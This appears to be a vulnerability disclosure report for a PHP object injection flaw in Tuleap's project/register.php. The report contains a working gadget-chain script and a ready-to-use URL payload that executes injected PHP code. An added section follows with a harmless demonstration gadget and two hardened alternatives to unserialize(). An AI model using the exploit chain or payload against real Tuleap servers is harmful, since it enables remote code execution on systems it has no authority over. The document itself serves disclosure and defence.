Original report:
I discovered a PHP Object Injection Vulnerability which affects the latest version of Tuleap (7.6-3) and probably older versions. Actually I spotted the vulnerability while auditing the source tree of version 7.6-2, and today I've tested and confirmed the vulnerability on a Tuleap virtual appliance downloaded from your website (TuleapAppliance.7.5.ova). This is the vulnerable line of code:
https://github.com/Enalean/tuleap/blob/master/src/www/project/register.php#L39
User input passed through the “data” request parameter is not properly sanitized before being used in a call to the “unserialize()” function. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow authenticated attackers to execute arbitrary PHP code via a specially crafted "POP chain", leveraging the Jabbex::__destruct() magic method:
<?php
// Gadget chain as built by the reporter: a Jabbex object wraps a Jabber object
// whose 'debug_log' event handler is a callable pointing at
// Transition_PostAction_FieldFactory, so that Jabbex::__destruct() ends up
// running the payload string below.
class Chart {}

class Transition_PostAction_FieldFactory
{
    // Payload string reached at the end of the chain; the report shows it
    // executing phpinfo() and stopping the script.
    protected $post_actions_classes = array('1;phpinfo();die;//');
}

class Jabber
{
    function __construct()
    {
        $this->_use_log = 1;                 // make the logging path active
        $this->_connection = new Chart;      // any object will do here
        // [object, method] callable invoked for the 'debug_log' event
        $this->_event_handlers['debug_log'] = array(new Transition_PostAction_FieldFactory, 'fetchPostActions');
    }
}

class EventHandler
{
    private $authenticated = true;
}

// Outermost object: its __destruct() magic method starts the chain when the
// unserialized object is destroyed.
class Jabbex
{
    private $handler, $jab;
    function __construct()
    {
        $this->jab = new Jabber;
        $this->handler = new EventHandler;
    }
}

// URL-encoded serialized object, ready to be passed as the "data" parameter
print rawurlencode(serialize(new Jabbex));
?>
The above PHP code will print a "data" parameter which will trigger the vulnerability. Thus an attacker just needs to log in to Tuleap and visit the following URL in order to see a "phpinfo" page (note that arbitrary PHP code might be executed):
http://[host]/[tuleap]/project/register.php?data=O%3A6%3A%22Jabbex%22%3A2%3A%7Bs%3A15%3A%22%00Jabbex%00handler%22%3BO%3A12%3A%22EventHandler%22%3A1%3A%7Bs%3A27%3A%22%00EventHandler%00authenticated%22%3Bb%3A1%3B%7Ds%3A11%3A%22%00Jabbex%00jab%22%3BO%3A6%3A%22Jabber%22%3A3%3A%7Bs%3A8%3A%22_use_log%22%3Bi%3A1%3Bs%3A11%3A%22_connection%22%3BO%3A5%3A%22Chart%22%3A0%3A%7B%7Ds%3A15%3A%22_event_handlers%22%3Ba%3A1%3A%7Bs%3A9%3A%22debug_log%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A34%3A%22Transition_PostAction_FieldFactory%22%3A1%3A%7Bs%3A23%3A%22%00%2A%00post_actions_classes%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A18%3A%221%3Bphpinfo%28%29%3Bdie%3B%2F%2F%22%3B%7D%7Di%3A1%3Bs%3A16%3A%22fetchPostActions%22%3B%7D%7D%7D%7D
In order to successfully exploit this vulnerability, the 'sys_create_project_in_one_step' option must be disabled.
Kind regards,
Egidio Romano
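The report above describes the general pattern: request data fed straight into unserialize(), plus any class in the codebase with a usable magic method, gives object injection. The following is an added example, not Tuleap's code and not part of the original report: a stand-in gadget class (LogWriter, whose __destruct() only writes a file) next to the vulnerable call and two hardened alternatives. Every class and function name in it is invented for illustration; the allowed_classes option assumes PHP 7.0 or later (on older PHP only the second mitigation, not using serialize() for browser round-trips at all, is available).

```php
<?php
// Added example, not Tuleap code: a stand-in gadget plus the vulnerable and
// hardened ways of restoring request-supplied state. All names are invented.

// Stand-in for a class with a dangerous __destruct (the role Jabbex plays in
// the report). Here the side effect is only a file write.
class LogWriter
{
    public $logfile = '';
    public $entry = '';

    public function __destruct()
    {
        if ($this->logfile !== '') {
            file_put_contents($this->logfile, $this->entry);
        }
    }
}

// Vulnerable pattern: the attacker controls the serialized string, so any
// class defined (or autoloadable) in the application can be instantiated and
// its magic methods will run.
function restoreVulnerable(string $data)
{
    return unserialize($data);
}

// Mitigation 1 (PHP >= 7.0): refuse to instantiate objects at all. Objects in
// the input become __PHP_Incomplete_Class, whose magic methods never run.
function restoreNoObjects(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

// Mitigation 2: do not round-trip state through serialize() at all. Encode it
// as JSON (no objects, no magic methods) and authenticate it with an HMAC so
// only blobs the server itself produced are accepted.
function packFormState(array $state, string $key): string
{
    $json = json_encode($state);
    return base64_encode($json) . '.' . hash_hmac('sha256', $json, $key);
}

function unpackFormState(string $blob, string $key): ?array
{
    $parts = explode('.', $blob, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $json = base64_decode($parts[0], true);
    if ($json === false || !hash_equals(hash_hmac('sha256', $json, $key), $parts[1])) {
        return null;            // forged or tampered blob
    }
    $state = json_decode($json, true);
    return is_array($state) ? $state : null;
}

// --- demo -----------------------------------------------------------------
$target = sys_get_temp_dir() . '/poi_demo_' . getmypid() . '.txt';

// Constructed payload, built the same way the report builds its "data" value.
$g = new LogWriter();
$g->logfile = $target;
$g->entry   = "gadget ran\n";
$payload = serialize($g);
$g->logfile = '';           // keep the original object from writing when it is destroyed

$obj = restoreVulnerable($payload);
unset($obj);                // __destruct fires here
echo 'unserialize(): ', file_exists($target) ? "gadget ran\n" : "no effect\n";
@unlink($target);

$obj = restoreNoObjects($payload);
echo 'allowed_classes=false: got ', get_class($obj), "\n";   // __PHP_Incomplete_Class
unset($obj);                // no destructor runs on an incomplete class
echo 'allowed_classes=false: ', file_exists($target) ? "gadget ran\n" : "no effect\n";

$key  = 'server-side secret, e.g. loaded from the site configuration';
$blob = packFormState(['form_full_name' => 'My Project', 'form_unix_name' => 'myproject'], $key);
var_dump(unpackFormState($blob, $key) !== null);                  // bool(true): genuine blob
var_dump(unpackFormState(substr($blob, 0, -1) . 'x', $key));      // NULL: tampered blob rejected
```

Run it with `php example.php`. The first two outputs show the whole point of the report: with plain unserialize() the gadget's destructor runs as soon as the object is dropped, while with allowed_classes set to false the same payload yields an incomplete class and nothing happens. The JSON/HMAC variant removes the class of bug entirely, since the decoded value can never be an object; hash_equals() is used for the comparison so that the check is not timing-dependent.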